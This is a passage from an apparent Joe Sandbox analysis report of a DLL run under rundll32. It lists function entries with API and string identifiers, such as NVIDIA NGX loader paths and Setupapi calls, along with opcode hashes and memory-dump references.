                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$ErrorFreeLast$AllocAttributesFile
                                                                                                                                  • String ID: \SystemRoot\system32\$system32\
                                                                                                                                  • API String ID: 544983162-552109975
                                                                                                                                  • Opcode ID: 730c387bfeee172c065cf2142a85f4546424462d022ed5fe7a70941d72ad0581
                                                                                                                                  • Instruction ID: 1c7d87ab6cad788fbbb713ed21df896e947c7fdfb9360815abeff92000b77ab5
                                                                                                                                  • Opcode Fuzzy Hash: 730c387bfeee172c065cf2142a85f4546424462d022ed5fe7a70941d72ad0581
                                                                                                                                  • Instruction Fuzzy Hash: 3C51D661B0C64346FE74AFE2A47117963A4AF45BA2F480638DD5E07BD5EFBDE4188340
                                                                                                                                  Function 00007FFD92DB5430 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 136libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorLastProc$FreeLibraryLoadLocal
                                                                                                                                  • String ID: $SYSTEM\CurrentControlSet\Control\Class\$SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                                                                                  • API String ID: 3750011226-2686055259
                                                                                                                                  • Opcode ID: 1dd6ce100cb580621a57aaa50faa47175d63362c2ce38f709ce9a83d8e805fc4
                                                                                                                                  • Instruction ID: e8c03c198e289bfc91957b6d5a852c21026eba2a72017343e8c05abc7aa39ce2
                                                                                                                                  • Opcode Fuzzy Hash: 1dd6ce100cb580621a57aaa50faa47175d63362c2ce38f709ce9a83d8e805fc4
                                                                                                                                  • Instruction Fuzzy Hash: 2E511E25B09B8286FA719F92B8742AA73E8BF89791F480039DE4D57B54EF7DE4049700
                                                                                                                                  Function 00007FFD92DB2D00 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName
                                                                                                                                  • String ID: C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_lib.cpp$FullPath$Loaded NGXCore from path (%S)$NGXCore not found next to the application$NGXLoadSigned$NGXLoadSignedFromPath$NGXPath$SOFTWARE\NVIDIA Corporation\Global\NGXCore$System\CurrentControlSet\Services\nvlddmkm\NGXCore$\nvngx.dll$error: failed to load %S$error: failed to locate NGX core path via registry key - error %l$warning: unable to find filename for the application
                                                                                                                                  • API String ID: 514040917-3979418977
                                                                                                                                  • Opcode ID: f4d2a229c56032707af2cf9942862fa793be9a46e9b9c06362997328e222db2a
                                                                                                                                  • Instruction ID: e551b0073be0a8d42f0a4a2f2cc2601d152bf07ecac1720386ac2747e9f2c1d3
                                                                                                                                  • Opcode Fuzzy Hash: f4d2a229c56032707af2cf9942862fa793be9a46e9b9c06362997328e222db2a
                                                                                                                                  • Instruction Fuzzy Hash: 75515F31B1DA4792FA74DF90E8602EA2369FF84751F801136E94E53AA5EF7CE509D380
                                                                                                                                  Function 00007FFD92DB92D0 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 245COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                  • String ID: %s: Invalid input file or NULL encoder params$%s: Total Frames generated - %x for %x Image transcode object$%s: Cannot allocate transcode object$%s: CoInitializeEx failed with %x error$%s: MFStartup : MF initialization failed with %x error$%s: Total Frames generated - %d for %x video transcode object$%s: Transcode initialized for Image media type with %x object$%s: Transcode initialized for video media type with %x object$0$InitializeApp$Transcode
                                                                                                                                  • API String ID: 3442037557-3066126349
                                                                                                                                  • Opcode ID: 81151dc22e6085f7dcf4099bdfb8c54fe29bf8f3d460ed9fe7c7e9b300c8df07
                                                                                                                                  • Instruction ID: 39014aa6ae9ae216aa32d3c13dc433ab6fe91b91599c44db6a220cbec540037a
                                                                                                                                  • Opcode Fuzzy Hash: 81151dc22e6085f7dcf4099bdfb8c54fe29bf8f3d460ed9fe7c7e9b300c8df07
                                                                                                                                  • Instruction Fuzzy Hash: 3CB14F71708B4286F7A0CF96E89066977A9FB88781F50413AEB8D93B94DF7DE440CB40
                                                                                                                                  Function 00007FFD92ECEF70 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 215libraryloadermemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
                                                                                                                                  • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInfo$SetupDiGetClassDevsW$SetupDiGetDeviceInterfaceDetailW$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                                                                                  • API String ID: 576420853-2811369298
                                                                                                                                  • Opcode ID: e36274d5b006de419470d65754a9c31c6c642be75edc98a9d974be8a120309cb
                                                                                                                                  • Instruction ID: 28388dfaf8cec13395af9fc7e4dd8edf1be19c2989ede713cabbcccba651a44f
                                                                                                                                  • Opcode Fuzzy Hash: e36274d5b006de419470d65754a9c31c6c642be75edc98a9d974be8a120309cb
                                                                                                                                  • Instruction Fuzzy Hash: 32A19926B09B8285FB34DF95F8A423933A8FB48B91F45413AD96D937A4EF7DE0409344
                                                                                                                                  Function 00007FFD92EDDA00 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 117memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$Free$ConditionMask$FullNamePath$AddressAllocInfoLibraryLoadProcVerifyVersion
                                                                                                                                  • String ID: $$&$*
                                                                                                                                  • API String ID: 828358482-3416282258
                                                                                                                                  • Opcode ID: 5729eadd254e398a79da1de9597fab71f461e464946d20159106587438328c11
                                                                                                                                  • Instruction ID: 4775745869bc505484dbf9bf3be84e7f981c8cf2551b826c0af4fc4f24f8cd44
                                                                                                                                  • Opcode Fuzzy Hash: 5729eadd254e398a79da1de9597fab71f461e464946d20159106587438328c11
                                                                                                                                  • Instruction Fuzzy Hash: C341ACB2B0968286FB309F92B97427567A4FF89794F044238CA4E97BA0DF7DE4418740
                                                                                                                                  Function 00007FFD92DC3920 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 109filelibraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$File$AttributesCloseCreateHandleLibraryLoad
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 3653152856-336475711
                                                                                                                                  • Opcode ID: bbbf8b0cfe091933c39af1670c220df65eed86bdcb4e0475fc3e254f7dabdbc7
                                                                                                                                  • Instruction ID: 190c892bbd5e81f692fb4f5c81fc73a62367a7efc52e30d7344eb8e91649e643
                                                                                                                                  • Opcode Fuzzy Hash: bbbf8b0cfe091933c39af1670c220df65eed86bdcb4e0475fc3e254f7dabdbc7
                                                                                                                                  • Instruction Fuzzy Hash: AC411662F0875242FF754FA6A5A013962D4AF84BE6F444239DE5E12FE4DF7CE8468700
                                                                                                                                  Function 00007FFD92DB5080 Relevance: 19.6, APIs: 13, Instructions: 107COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: 9f186a2e040995e6f0b0e64b1a87cd653ec6994900668234fa6fa4513ef19a1e
                                                                                                                                  • Instruction ID: f26a588484a3dedbfc63dc8b9e97b0b9134f1d1e67f009b897f996952a359dde
                                                                                                                                  • Opcode Fuzzy Hash: 9f186a2e040995e6f0b0e64b1a87cd653ec6994900668234fa6fa4513ef19a1e
                                                                                                                                  • Instruction Fuzzy Hash: 45612539B49B8285F674CFD1BCB813033ACBF48B55B5A4539D49EE2A60CF7C6460A319
                                                                                                                                  Function 00007FFD92DBD5B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 149libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc$LibraryLoad
                                                                                                                                  • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                  • API String ID: 4089895538-3997890769
                                                                                                                                  • Opcode ID: 25bd4a92d865eb986d4886ce9e2fc91b6f185cd407b783bdb8d090bd23f88a26
                                                                                                                                  • Instruction ID: 5fc331ecfec00009a4cd2884bb0a0bebad1a66318b6d68ec6d26482157898654
                                                                                                                                  • Opcode Fuzzy Hash: 25bd4a92d865eb986d4886ce9e2fc91b6f185cd407b783bdb8d090bd23f88a26
                                                                                                                                  • Instruction Fuzzy Hash: 77313E20F0CB4782FB35AFE6E8783B522A9BF94741F804135D54E936A5EF6CE5189350
                                                                                                                                  Function 00007FFD92ED1790 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 133libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
